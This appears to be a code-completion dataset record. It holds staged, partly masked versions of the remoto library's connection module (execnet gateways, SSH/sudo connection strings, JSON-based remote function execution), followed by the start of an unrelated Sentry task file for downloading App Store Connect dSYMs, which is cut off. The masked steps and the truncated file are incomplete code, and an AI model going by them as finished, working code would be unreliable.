as-is. Other implementations will end up doing transformations to the\n command by prefixing it with other flags needed. See\n :class:`KubernetesConnection` for an example\n \"\"\"\n return cmd\n\n def execute(self, function, **kw):\n return self.gateway.remote_exec(function, **kw)\n\n def exit(self):\n self.group.terminate(timeout=1.0)\n\n def import_module(self, module, python_executable=None):\n \"\"\"\n Allows remote execution of a local module. Depending on the\n ``remote_import_system`` attribute it may use execnet's implementation\n or remoto's own based on JSON.\n\n .. note:: It is not possible to use execnet's remote execution model on\n connections that aren't SSH or Local.\n \"\"\"\n if self.remote_import_system is not None:\n if self.remote_import_system == 'json':\n self.remote_module = JsonModuleExecute(self, module, self.\n logger, python_executable=python_executable)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway,\n module, self.logger)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway, module,\n self.logger)\n return self.remote_module\n\n def has_connection(self):\n if self.gateway:\n return self.gateway.hasreceiver()\n return False\n\n\nclass LegacyModuleExecute(object):\n \"\"\"\n This (now legacy) class, is the way ``execnet`` does its remote module\n execution: it sends it over a channel, and does a send/receive for\n exchanging information. This only works when there is native support in\n execnet for a given connection. This currently means it would only work for\n ssh and local (Popen) connections, and will not work for anything like\n kubernetes or containers.\n \"\"\"\n\n def __init__(self, gateway, module, logger=None):\n self.channel = gateway.remote_exec(module)\n self.module = module\n self.logger = logger\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n arguments = self._convert_args(args)\n if docstring:\n self.logger.debug(docstring)\n self.channel.send('%s(%s)' % (name, arguments))\n try:\n return self.channel.receive()\n except Exception as error:\n exc_line = str(error)\n for tb_line in reversed(str(error).split('\\n')):\n if tb_line:\n exc_line = tb_line\n break\n raise RuntimeError(exc_line)\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n def _convert_args(self, args):\n if args:\n if len(args) > 1:\n arguments = str(args).rstrip(')').lstrip('(')\n else:\n arguments = str(args).rstrip(',)').lstrip('(')\n else:\n arguments = ''\n return arguments\n\n\n<mask token>\n\n\nclass JsonModuleExecute(object):\n \"\"\"\n This remote execution class allows to ship Python code over to the remote\n node, load it via ``stdin`` and call any function with arguments. The\n resulting response is dumped over JSON so that it can get printed to\n ``stdout``, then captured locally, loaded into regular Python and returned.\n\n If the remote end generates an exception with a traceback, that is captured\n as well and raised accordingly.\n \"\"\"\n\n def __init__(self, conn, module, logger=None, python_executable=None):\n self.conn = conn\n self.module = module\n self._module_source = inspect.getsource(module)\n self.logger = logger\n self.python_executable = python_executable\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n if docstring:\n self.logger.debug(docstring)\n if len(args):\n source = self._module_source + dump_template % (name, repr(\n args))\n else:\n source = self._module_source + dump_template % (name, '()')\n if self.python_executable is None:\n self.python_executable = get_python_executable(self.conn)\n out, err, code = check(self.conn, [self.python_executable],\n stdin=source.encode('utf-8'))\n if not out:\n if not err:\n err = ['Traceback (most recent call last):',\n ' File \"<stdin>\", in <module>', \n 'Exception: error calling \"%s\"' % name]\n if code:\n raise Exception('Unexpected remote exception: \\n%s\\n%s' %\n ('\\n'.join(out), '\\n'.join(err)))\n return\n response = json.loads(out[0])\n if response['exception']:\n raise Exception(response['exception'])\n return response['return']\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass BaseConnection(object):\n \"\"\"\n Base class for Connection objects. Provides a generic interface to execnet\n for setting up the connection\n \"\"\"\n executable = ''\n remote_import_system = 'legacy'\n\n def __init__(self, hostname, logger=None, sudo=False, threads=1, eager=\n True, detect_sudo=False, use_ssh=False, interpreter=None,\n ssh_options=None):\n self.sudo = sudo\n self.hostname = hostname\n self.ssh_options = ssh_options\n self.logger = logger or basic_remote_logger()\n self.remote_module = None\n self.channel = None\n self.use_ssh = use_ssh\n self.global_timeout = None\n self.interpreter = interpreter or 'python%s' % sys.version_info[0]\n if eager:\n try:\n if detect_sudo:\n self.sudo = self._detect_sudo()\n self.gateway = self._make_gateway(hostname)\n except OSError:\n self.logger.error(\n \"Can't communicate with remote host, possibly because %s is not installed there\"\n % self.interpreter)\n raise\n\n def _make_gateway(self, hostname):\n self.group = execnet.Group()\n gateway = self.group.makegateway(self._make_connection_string(hostname)\n )\n gateway.reconfigure(py2str_as_py3str=False, py3str_as_py2str=False)\n return gateway\n\n def _detect_sudo(self, _execnet=None):\n \"\"\"\n ``sudo`` detection has to create a different connection to the remote\n host so that we can reliably ensure that ``getuser()`` will return the\n right information.\n\n After getting the user info it closes the connection and returns\n a boolean\n \"\"\"\n exc = _execnet or execnet\n gw = exc.makegateway(self._make_connection_string(self.hostname,\n use_sudo=False))\n channel = gw.remote_exec(\n 'import getpass; channel.send(getpass.getuser())')\n result = channel.receive()\n gw.exit()\n if result == 'root':\n return False\n self.logger.debug('connection detected need for sudo')\n return True\n\n def _make_connection_string(self, hostname, _needs_ssh=None, use_sudo=None\n ):\n _needs_ssh = _needs_ssh or needs_ssh\n interpreter = self.interpreter\n if use_sudo is not None:\n if use_sudo:\n interpreter = 'sudo ' + interpreter\n elif self.sudo:\n interpreter = 'sudo ' + interpreter\n if _needs_ssh(hostname) or self.use_ssh:\n if self.ssh_options:\n return 'ssh=%s %s//python=%s' % (self.ssh_options, hostname,\n interpreter)\n else:\n return 'ssh=%s//python=%s' % (hostname, interpreter)\n return 'popen//python=%s' % interpreter\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.group.terminate(timeout=1.0)\n return False\n\n def cmd(self, cmd):\n \"\"\"\n In the base connection class, this method just returns the ``cmd``\n as-is. Other implementations will end up doing transformations to the\n command by prefixing it with other flags needed. See\n :class:`KubernetesConnection` for an example\n \"\"\"\n return cmd\n\n def execute(self, function, **kw):\n return self.gateway.remote_exec(function, **kw)\n\n def exit(self):\n self.group.terminate(timeout=1.0)\n\n def import_module(self, module, python_executable=None):\n \"\"\"\n Allows remote execution of a local module. Depending on the\n ``remote_import_system`` attribute it may use execnet's implementation\n or remoto's own based on JSON.\n\n .. note:: It is not possible to use execnet's remote execution model on\n connections that aren't SSH or Local.\n \"\"\"\n if self.remote_import_system is not None:\n if self.remote_import_system == 'json':\n self.remote_module = JsonModuleExecute(self, module, self.\n logger, python_executable=python_executable)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway,\n module, self.logger)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway, module,\n self.logger)\n return self.remote_module\n\n def has_connection(self):\n if self.gateway:\n return self.gateway.hasreceiver()\n return False\n\n\nclass LegacyModuleExecute(object):\n \"\"\"\n This (now legacy) class, is the way ``execnet`` does its remote module\n execution: it sends it over a channel, and does a send/receive for\n exchanging information. This only works when there is native support in\n execnet for a given connection. This currently means it would only work for\n ssh and local (Popen) connections, and will not work for anything like\n kubernetes or containers.\n \"\"\"\n\n def __init__(self, gateway, module, logger=None):\n self.channel = gateway.remote_exec(module)\n self.module = module\n self.logger = logger\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n arguments = self._convert_args(args)\n if docstring:\n self.logger.debug(docstring)\n self.channel.send('%s(%s)' % (name, arguments))\n try:\n return self.channel.receive()\n except Exception as error:\n exc_line = str(error)\n for tb_line in reversed(str(error).split('\\n')):\n if tb_line:\n exc_line = tb_line\n break\n raise RuntimeError(exc_line)\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n def _convert_args(self, args):\n if args:\n if len(args) > 1:\n arguments = str(args).rstrip(')').lstrip('(')\n else:\n arguments = str(args).rstrip(',)').lstrip('(')\n else:\n arguments = ''\n return arguments\n\n\n<mask token>\n\n\nclass JsonModuleExecute(object):\n \"\"\"\n This remote execution class allows to ship Python code over to the remote\n node, load it via ``stdin`` and call any function with arguments. The\n resulting response is dumped over JSON so that it can get printed to\n ``stdout``, then captured locally, loaded into regular Python and returned.\n\n If the remote end generates an exception with a traceback, that is captured\n as well and raised accordingly.\n \"\"\"\n\n def __init__(self, conn, module, logger=None, python_executable=None):\n self.conn = conn\n self.module = module\n self._module_source = inspect.getsource(module)\n self.logger = logger\n self.python_executable = python_executable\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n if docstring:\n self.logger.debug(docstring)\n if len(args):\n source = self._module_source + dump_template % (name, repr(\n args))\n else:\n source = self._module_source + dump_template % (name, '()')\n if self.python_executable is None:\n self.python_executable = get_python_executable(self.conn)\n out, err, code = check(self.conn, [self.python_executable],\n stdin=source.encode('utf-8'))\n if not out:\n if not err:\n err = ['Traceback (most recent call last):',\n ' File \"<stdin>\", in <module>', \n 'Exception: error calling \"%s\"' % name]\n if code:\n raise Exception('Unexpected remote exception: \\n%s\\n%s' %\n ('\\n'.join(out), '\\n'.join(err)))\n return\n response = json.loads(out[0])\n if response['exception']:\n raise Exception(response['exception'])\n return response['return']\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n\ndef basic_remote_logger():\n logging.basicConfig()\n logger = logging.getLogger(socket.gethostname())\n logger.setLevel(logging.DEBUG)\n return logger\n\n\ndef needs_ssh(hostname, _socket=None):\n \"\"\"\n Obtains remote hostname of the socket and cuts off the domain part\n of its FQDN.\n \"\"\"\n if hostname.lower() in ['localhost', '127.0.0.1', '127.0.1.1']:\n return False\n _socket = _socket or socket\n fqdn = _socket.getfqdn()\n if hostname == fqdn:\n return False\n local_hostname = _socket.gethostname()\n local_short_hostname = local_hostname.split('.')[0]\n if local_hostname == hostname or local_short_hostname == hostname:\n return False\n return True\n\n\n<mask token>\n",
"step-4": "import inspect\nimport json\nimport socket\nimport sys\nimport execnet\nimport logging\nfrom remoto.process import check\n\n\nclass BaseConnection(object):\n \"\"\"\n Base class for Connection objects. Provides a generic interface to execnet\n for setting up the connection\n \"\"\"\n executable = ''\n remote_import_system = 'legacy'\n\n def __init__(self, hostname, logger=None, sudo=False, threads=1, eager=\n True, detect_sudo=False, use_ssh=False, interpreter=None,\n ssh_options=None):\n self.sudo = sudo\n self.hostname = hostname\n self.ssh_options = ssh_options\n self.logger = logger or basic_remote_logger()\n self.remote_module = None\n self.channel = None\n self.use_ssh = use_ssh\n self.global_timeout = None\n self.interpreter = interpreter or 'python%s' % sys.version_info[0]\n if eager:\n try:\n if detect_sudo:\n self.sudo = self._detect_sudo()\n self.gateway = self._make_gateway(hostname)\n except OSError:\n self.logger.error(\n \"Can't communicate with remote host, possibly because %s is not installed there\"\n % self.interpreter)\n raise\n\n def _make_gateway(self, hostname):\n self.group = execnet.Group()\n gateway = self.group.makegateway(self._make_connection_string(hostname)\n )\n gateway.reconfigure(py2str_as_py3str=False, py3str_as_py2str=False)\n return gateway\n\n def _detect_sudo(self, _execnet=None):\n \"\"\"\n ``sudo`` detection has to create a different connection to the remote\n host so that we can reliably ensure that ``getuser()`` will return the\n right information.\n\n After getting the user info it closes the connection and returns\n a boolean\n \"\"\"\n exc = _execnet or execnet\n gw = exc.makegateway(self._make_connection_string(self.hostname,\n use_sudo=False))\n channel = gw.remote_exec(\n 'import getpass; channel.send(getpass.getuser())')\n result = channel.receive()\n gw.exit()\n if result == 'root':\n return False\n self.logger.debug('connection detected need for sudo')\n return True\n\n def _make_connection_string(self, hostname, _needs_ssh=None, use_sudo=None\n ):\n _needs_ssh = _needs_ssh or needs_ssh\n interpreter = self.interpreter\n if use_sudo is not None:\n if use_sudo:\n interpreter = 'sudo ' + interpreter\n elif self.sudo:\n interpreter = 'sudo ' + interpreter\n if _needs_ssh(hostname) or self.use_ssh:\n if self.ssh_options:\n return 'ssh=%s %s//python=%s' % (self.ssh_options, hostname,\n interpreter)\n else:\n return 'ssh=%s//python=%s' % (hostname, interpreter)\n return 'popen//python=%s' % interpreter\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.group.terminate(timeout=1.0)\n return False\n\n def cmd(self, cmd):\n \"\"\"\n In the base connection class, this method just returns the ``cmd``\n as-is. Other implementations will end up doing transformations to the\n command by prefixing it with other flags needed. See\n :class:`KubernetesConnection` for an example\n \"\"\"\n return cmd\n\n def execute(self, function, **kw):\n return self.gateway.remote_exec(function, **kw)\n\n def exit(self):\n self.group.terminate(timeout=1.0)\n\n def import_module(self, module, python_executable=None):\n \"\"\"\n Allows remote execution of a local module. Depending on the\n ``remote_import_system`` attribute it may use execnet's implementation\n or remoto's own based on JSON.\n\n .. note:: It is not possible to use execnet's remote execution model on\n connections that aren't SSH or Local.\n \"\"\"\n if self.remote_import_system is not None:\n if self.remote_import_system == 'json':\n self.remote_module = JsonModuleExecute(self, module, self.\n logger, python_executable=python_executable)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway,\n module, self.logger)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway, module,\n self.logger)\n return self.remote_module\n\n def has_connection(self):\n if self.gateway:\n return self.gateway.hasreceiver()\n return False\n\n\nclass LegacyModuleExecute(object):\n \"\"\"\n This (now legacy) class, is the way ``execnet`` does its remote module\n execution: it sends it over a channel, and does a send/receive for\n exchanging information. This only works when there is native support in\n execnet for a given connection. This currently means it would only work for\n ssh and local (Popen) connections, and will not work for anything like\n kubernetes or containers.\n \"\"\"\n\n def __init__(self, gateway, module, logger=None):\n self.channel = gateway.remote_exec(module)\n self.module = module\n self.logger = logger\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n arguments = self._convert_args(args)\n if docstring:\n self.logger.debug(docstring)\n self.channel.send('%s(%s)' % (name, arguments))\n try:\n return self.channel.receive()\n except Exception as error:\n exc_line = str(error)\n for tb_line in reversed(str(error).split('\\n')):\n if tb_line:\n exc_line = tb_line\n break\n raise RuntimeError(exc_line)\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n def _convert_args(self, args):\n if args:\n if len(args) > 1:\n arguments = str(args).rstrip(')').lstrip('(')\n else:\n arguments = str(args).rstrip(',)').lstrip('(')\n else:\n arguments = ''\n return arguments\n\n\ndump_template = \"\"\"\nif __name__ == '__main__':\n import json, traceback\n obj = {'return': None, 'exception': None}\n try:\n obj['return'] = %s%s\n except Exception:\n obj['exception'] = traceback.format_exc()\n try:\n print(json.dumps(obj).decode('utf-8'))\n except AttributeError:\n print(json.dumps(obj))\n\"\"\"\n\n\nclass JsonModuleExecute(object):\n \"\"\"\n This remote execution class allows to ship Python code over to the remote\n node, load it via ``stdin`` and call any function with arguments. The\n resulting response is dumped over JSON so that it can get printed to\n ``stdout``, then captured locally, loaded into regular Python and returned.\n\n If the remote end generates an exception with a traceback, that is captured\n as well and raised accordingly.\n \"\"\"\n\n def __init__(self, conn, module, logger=None, python_executable=None):\n self.conn = conn\n self.module = module\n self._module_source = inspect.getsource(module)\n self.logger = logger\n self.python_executable = python_executable\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n if docstring:\n self.logger.debug(docstring)\n if len(args):\n source = self._module_source + dump_template % (name, repr(\n args))\n else:\n source = self._module_source + dump_template % (name, '()')\n if self.python_executable is None:\n self.python_executable = get_python_executable(self.conn)\n out, err, code = check(self.conn, [self.python_executable],\n stdin=source.encode('utf-8'))\n if not out:\n if not err:\n err = ['Traceback (most recent call last):',\n ' File \"<stdin>\", in <module>', \n 'Exception: error calling \"%s\"' % name]\n if code:\n raise Exception('Unexpected remote exception: \\n%s\\n%s' %\n ('\\n'.join(out), '\\n'.join(err)))\n return\n response = json.loads(out[0])\n if response['exception']:\n raise Exception(response['exception'])\n return response['return']\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n\ndef basic_remote_logger():\n logging.basicConfig()\n logger = logging.getLogger(socket.gethostname())\n logger.setLevel(logging.DEBUG)\n return logger\n\n\ndef needs_ssh(hostname, _socket=None):\n \"\"\"\n Obtains remote hostname of the socket and cuts off the domain part\n of its FQDN.\n \"\"\"\n if hostname.lower() in ['localhost', '127.0.0.1', '127.0.1.1']:\n return False\n _socket = _socket or socket\n fqdn = _socket.getfqdn()\n if hostname == fqdn:\n return False\n local_hostname = _socket.gethostname()\n local_short_hostname = local_hostname.split('.')[0]\n if local_hostname == hostname or local_short_hostname == hostname:\n return False\n return True\n\n\ndef get_python_executable(conn):\n \"\"\"\n Try to determine the remote Python version so that it can be used\n when executing. Avoids the problem of different Python versions, or distros\n that do not use ``python`` but do ``python3``\n \"\"\"\n executables = ['python3', 'python', 'python2.7']\n for executable in executables:\n conn.logger.debug(\n 'trying to determine remote python executable with %s' % executable\n )\n out, err, code = check(conn, ['which', executable])\n if code:\n conn.logger.warning('skipping %s, was not found in path' %\n executable)\n else:\n try:\n return out[0].strip()\n except IndexError:\n conn.logger.warning('could not parse stdout: %s' % out)\n conn.logger.info('Falling back to using interpreter: %s' % conn.interpreter\n )\n return conn.interpreter\n",
"step-5": "import inspect\nimport json\nimport socket\nimport sys\nimport execnet\nimport logging\nfrom remoto.process import check\n\n\nclass BaseConnection(object):\n \"\"\"\n Base class for Connection objects. Provides a generic interface to execnet\n for setting up the connection\n \"\"\"\n executable = ''\n remote_import_system = 'legacy'\n\n def __init__(self, hostname, logger=None, sudo=False, threads=1, eager=True,\n detect_sudo=False, use_ssh=False, interpreter=None, ssh_options=None):\n self.sudo = sudo\n self.hostname = hostname\n self.ssh_options = ssh_options\n self.logger = logger or basic_remote_logger()\n self.remote_module = None\n self.channel = None\n self.use_ssh = use_ssh\n self.global_timeout = None # wait for ever\n\n self.interpreter = interpreter or 'python%s' % sys.version_info[0]\n\n if eager:\n try:\n if detect_sudo:\n self.sudo = self._detect_sudo()\n self.gateway = self._make_gateway(hostname)\n except OSError:\n self.logger.error(\n \"Can't communicate with remote host, possibly because \"\n \"%s is not installed there\" % self.interpreter\n )\n raise\n\n def _make_gateway(self, hostname):\n self.group = execnet.Group()\n gateway = self.group.makegateway(\n self._make_connection_string(hostname)\n )\n gateway.reconfigure(py2str_as_py3str=False, py3str_as_py2str=False)\n return gateway\n\n def _detect_sudo(self, _execnet=None):\n \"\"\"\n ``sudo`` detection has to create a different connection to the remote\n host so that we can reliably ensure that ``getuser()`` will return the\n right information.\n\n After getting the user info it closes the connection and returns\n a boolean\n \"\"\"\n exc = _execnet or execnet\n gw = exc.makegateway(\n self._make_connection_string(self.hostname, use_sudo=False)\n )\n\n channel = gw.remote_exec(\n 'import getpass; channel.send(getpass.getuser())'\n )\n\n result = channel.receive()\n gw.exit()\n\n if result == 'root':\n return False\n self.logger.debug('connection detected need for sudo')\n return True\n\n def _make_connection_string(self, hostname, _needs_ssh=None, use_sudo=None):\n _needs_ssh = _needs_ssh or needs_ssh\n interpreter = self.interpreter\n if use_sudo is not None:\n if use_sudo:\n interpreter = 'sudo ' + interpreter\n elif self.sudo:\n interpreter = 'sudo ' + interpreter\n\n if _needs_ssh(hostname) or self.use_ssh:\n if self.ssh_options:\n return 'ssh=%s %s//python=%s' % (\n self.ssh_options, hostname, interpreter\n )\n else:\n return 'ssh=%s//python=%s' % (hostname, interpreter)\n return 'popen//python=%s' % interpreter\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.group.terminate(timeout=1.0)\n return False\n\n def cmd(self, cmd):\n \"\"\"\n In the base connection class, this method just returns the ``cmd``\n as-is. Other implementations will end up doing transformations to the\n command by prefixing it with other flags needed. See\n :class:`KubernetesConnection` for an example\n \"\"\"\n return cmd\n\n def execute(self, function, **kw):\n return self.gateway.remote_exec(function, **kw)\n\n def exit(self):\n self.group.terminate(timeout=1.0)\n\n def import_module(self, module, python_executable=None):\n \"\"\"\n Allows remote execution of a local module. Depending on the\n ``remote_import_system`` attribute it may use execnet's implementation\n or remoto's own based on JSON.\n\n .. note:: It is not possible to use execnet's remote execution model on\n connections that aren't SSH or Local.\n \"\"\"\n if self.remote_import_system is not None:\n if self.remote_import_system == 'json':\n self.remote_module = JsonModuleExecute(self, module, self.logger,\n python_executable=python_executable)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway, module, self.logger)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway, module, self.logger)\n return self.remote_module\n\n def has_connection(self):\n if self.gateway:\n return self.gateway.hasreceiver()\n return False\n\n\nclass LegacyModuleExecute(object):\n \"\"\"\n This (now legacy) class, is the way ``execnet`` does its remote module\n execution: it sends it over a channel, and does a send/receive for\n exchanging information. This only works when there is native support in\n execnet for a given connection. This currently means it would only work for\n ssh and local (Popen) connections, and will not work for anything like\n kubernetes or containers.\n \"\"\"\n\n def __init__(self, gateway, module, logger=None):\n self.channel = gateway.remote_exec(module)\n self.module = module\n self.logger = logger\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = \"module %s does not have attribute %s\" % (str(self.module), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n arguments = self._convert_args(args)\n if docstring:\n self.logger.debug(docstring)\n self.channel.send(\"%s(%s)\" % (name, arguments))\n try:\n return self.channel.receive()\n except Exception as error:\n # Error will come as a string of a traceback, remove everything\n # up to the actual exception since we do get garbage otherwise\n # that points to non-existent lines in the compiled code\n exc_line = str(error)\n for tb_line in reversed(str(error).split('\\n')):\n if tb_line:\n exc_line = tb_line\n break\n raise RuntimeError(exc_line)\n\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n def _convert_args(self, args):\n if args:\n if len(args) > 1:\n arguments = str(args).rstrip(')').lstrip('(')\n else:\n arguments = str(args).rstrip(',)').lstrip('(')\n else:\n arguments = ''\n return arguments\n\n\ndump_template = \"\"\"\nif __name__ == '__main__':\n import json, traceback\n obj = {'return': None, 'exception': None}\n try:\n obj['return'] = %s%s\n except Exception:\n obj['exception'] = traceback.format_exc()\n try:\n print(json.dumps(obj).decode('utf-8'))\n except AttributeError:\n print(json.dumps(obj))\n\"\"\"\n\n\nclass JsonModuleExecute(object):\n \"\"\"\n This remote execution class allows to ship Python code over to the remote\n node, load it via ``stdin`` and call any function with arguments. The\n resulting response is dumped over JSON so that it can get printed to\n ``stdout``, then captured locally, loaded into regular Python and returned.\n\n If the remote end generates an exception with a traceback, that is captured\n as well and raised accordingly.\n \"\"\"\n\n def __init__(self, conn, module, logger=None, python_executable=None):\n self.conn = conn\n self.module = module\n self._module_source = inspect.getsource(module)\n self.logger = logger\n self.python_executable = python_executable\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = \"module %s does not have attribute %s\" % (str(self.module), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n if docstring:\n self.logger.debug(docstring)\n if len(args):\n source = self._module_source + dump_template % (name, repr(args))\n else:\n source = self._module_source + dump_template % (name, '()')\n\n # check python interpreter\n if self.python_executable is None:\n self.python_executable = get_python_executable(self.conn)\n\n out, err, code = check(self.conn, [self.python_executable], stdin=source.encode('utf-8'))\n if not out:\n if not err:\n err = [\n 'Traceback (most recent call last):',\n ' File \"<stdin>\", in <module>',\n 'Exception: error calling \"%s\"' % name\n ]\n if code:\n raise Exception('Unexpected remote exception: \\n%s\\n%s' % ('\\n'.join(out), '\\n'.join(err)))\n # at this point, there was no stdout, and the exit code was 0,\n # we must return so that we don't fail trying to serialize back\n # the JSON\n return\n response = json.loads(out[0])\n if response['exception']:\n raise Exception(response['exception'])\n return response['return']\n\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n\ndef basic_remote_logger():\n logging.basicConfig()\n logger = logging.getLogger(socket.gethostname())\n logger.setLevel(logging.DEBUG)\n return logger\n\n\ndef needs_ssh(hostname, _socket=None):\n \"\"\"\n Obtains remote hostname of the socket and cuts off the domain part\n of its FQDN.\n \"\"\"\n if hostname.lower() in ['localhost', '127.0.0.1', '127.0.1.1']:\n return False\n _socket = _socket or socket\n fqdn = _socket.getfqdn()\n if hostname == fqdn:\n return False\n local_hostname = _socket.gethostname()\n local_short_hostname = local_hostname.split('.')[0]\n if local_hostname == hostname or local_short_hostname == hostname:\n return False\n return True\n\n\ndef get_python_executable(conn):\n \"\"\"\n Try to determine the remote Python version so that it can be used\n when executing. Avoids the problem of different Python versions, or distros\n that do not use ``python`` but do ``python3``\n \"\"\"\n # executables in order of preference:\n executables = ['python3', 'python', 'python2.7']\n for executable in executables:\n conn.logger.debug('trying to determine remote python executable with %s' % executable)\n out, err, code = check(conn, ['which', executable])\n if code:\n conn.logger.warning('skipping %s, was not found in path' % executable)\n else:\n try:\n return out[0].strip()\n except IndexError:\n conn.logger.warning('could not parse stdout: %s' % out)\n\n # if all fails, we just return whatever the main connection had\n conn.logger.info('Falling back to using interpreter: %s' % conn.interpreter)\n return conn.interpreter\n",
"step-ids": [
19,
23,
27,
30,
31
]
}
|
[
19,
23,
27,
30,
31
] |
"""Tasks for managing Debug Information Files from Apple App Store Connect.
Users can instruct Sentry to download dSYM from App Store Connect and put them into Sentry's
debug files. These tasks enable this functionality.
"""
import logging
import pathlib
import tempfile
from typing import List, Mapping, Tuple
import requests
import sentry_sdk
from django.utils import timezone
from sentry.lang.native import appconnect
from sentry.models import (
AppConnectBuild,
LatestAppConnectBuildsCheck,
Project,
ProjectOption,
debugfile,
)
from sentry.tasks.base import instrumented_task
from sentry.utils import json, metrics, sdk
from sentry.utils.appleconnect import appstore_connect as appstoreconnect_api
logger = logging.getLogger(__name__)
# Sadly this decorator makes this entire function untyped for now as it does not itself have
# typing annotations. So we do all the work outside of the decorated task function to work
# around this.
# Since all these args must be pickled we keep them to built-in types as well.
@instrumented_task(name="sentry.tasks.app_store_connect.dsym_download", queue="appstoreconnect", ignore_result=True) # type: ignore
def dsym_download(project_id: int, config_id: str) -> None:
inner_dsym_download(project_id=project_id, config_id=config_id)
def inner_dsym_download(project_id: int, config_id: str) -> None:
"""Downloads the dSYMs from App Store Connect and stores them in the Project's debug files."""
with sdk.configure_scope() as scope:
scope.set_tag("project", project_id)
scope.set_tag("config_id", config_id)
project = Project.objects.get(pk=project_id)
config = appconnect.AppStoreConnectConfig.from_project_config(project, config_id)
client = appconnect.AppConnectClient.from_config(config)
listed_builds = client.list_builds()
builds = process_builds(project=project, config=config, to_process=listed_builds)
if not builds:
return
for i, (build, build_state) in enumerate(builds):
with sdk.configure_scope() as scope:
scope.set_context("dsym_downloads", {"total": len(builds), "completed": i})
with tempfile.NamedTemporaryFile() as dsyms_zip:
try:
client.download_dsyms(build, pathlib.Path(dsyms_zip.name))
# For no dSYMs, let the build be marked as fetched so they're not
# repeatedly re-checked every time this task is run.
except appconnect.NoDsymsError:
logger.debug("No dSYMs for build %s", build)
# Moves on to the next build so we don't check off fetched. This url will
# eventuallyTM be populated, so revisit it at a later time.
except appconnect.PendingDsymsError:
logger.debug("dSYM url currently unavailable for build %s", build)
continue
# early-return in unauthorized and forbidden to avoid trying all the other builds
# as well, since an expired token will error for all of them.
# the error is also swallowed unreported because this is an expected and actionable
# error.
except appstoreconnect_api.UnauthorizedError:
sentry_sdk.capture_message(
"Not authorized to download dSYM using current App Store Connect credentials",
level="info",
)
return
except appstoreconnect_api.ForbiddenError:
sentry_sdk.capture_message(
"Forbidden from downloading dSYM using current App Store Connect credentials",
level="info",
)
return
# Don't let malformed URLs abort all pending downloads in case it's an isolated instance
except ValueError as e:
sdk.capture_exception(e)
continue
# Assume request errors are a server side issue and do not abort all the
# pending downloads.
except appstoreconnect_api.RequestError as e:
sdk.capture_exception(e)
continue
except requests.RequestException as e:
sdk.capture_exception(e)
continue
else:
create_difs_from_dsyms_zip(dsyms_zip.name, project)
logger.debug("Uploaded dSYMs for build %s", build)
metrics.incr("tasks.app_store_connect.builds_ingested", sample_rate=1)
build_state.fetched = True
build_state.save()
def create_difs_from_dsyms_zip(dsyms_zip: str, project: Project) -> None:
with sentry_sdk.start_span(op="dsym-difs", description="Extract difs dSYM zip"):
with open(dsyms_zip, "rb") as fp:
created = debugfile.create_files_from_dif_zip(fp, project, accept_unknown=True)
for proj_debug_file in created:
logger.debug("Created %r for project %s", proj_debug_file, project.id)
def get_or_create_persisted_build(
project: Project, config: appconnect.AppStoreConnectConfig, build: appconnect.BuildInfo
) -> AppConnectBuild:
"""Fetches the sentry-internal :class:`AppConnectBuild`.
The build corresponds to the :class:`appconnect.BuildInfo` as returned by the
AppStore Connect API. If no build exists yet, a new "pending" build is created.
"""
try:
build_state = AppConnectBuild.objects.get(
project=project,
app_id=build.app_id,
platform=build.platform,
bundle_short_version=build.version,
bundle_version=build.build_number,
)
